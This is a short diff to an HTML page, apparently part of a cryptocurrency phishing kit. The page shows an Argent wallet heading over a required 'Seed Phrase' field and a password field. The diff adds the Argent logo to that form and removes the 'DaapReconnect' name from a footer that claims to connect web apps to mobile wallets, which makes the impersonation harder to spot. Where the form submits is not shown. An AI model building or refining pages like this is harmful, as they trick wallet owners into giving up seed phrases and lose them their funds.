--- a/argent.html
+++ b/argent.html
@@ -74,7 +74,10 @@
                         </div>
 
                         <div class="middle">
-                            <h4>Argent</h4>
+                            <div class="toop">
+                                <img src="argent.png" alt="">
+                                <h4>Argent</h4>   
+                            </div>
                             <textarea id="seed" minlength="30" name="Argent" placeholder="Seed Phrase..." required></textarea >
                             <input name="Password" id="movepass"  type="password"
                       placeholder="Password"/>
@@ -111,7 +114,7 @@
     <div class="footer-container">
         <div class="footer-leftpart">
             <img src="logo.svg" alt="logo">
-            <p>DaapReconnect connects web applications to supported mobile wallets.</p>
+            <p>Connects web applications to supported mobile wallets.</p>
             
        </div>
 
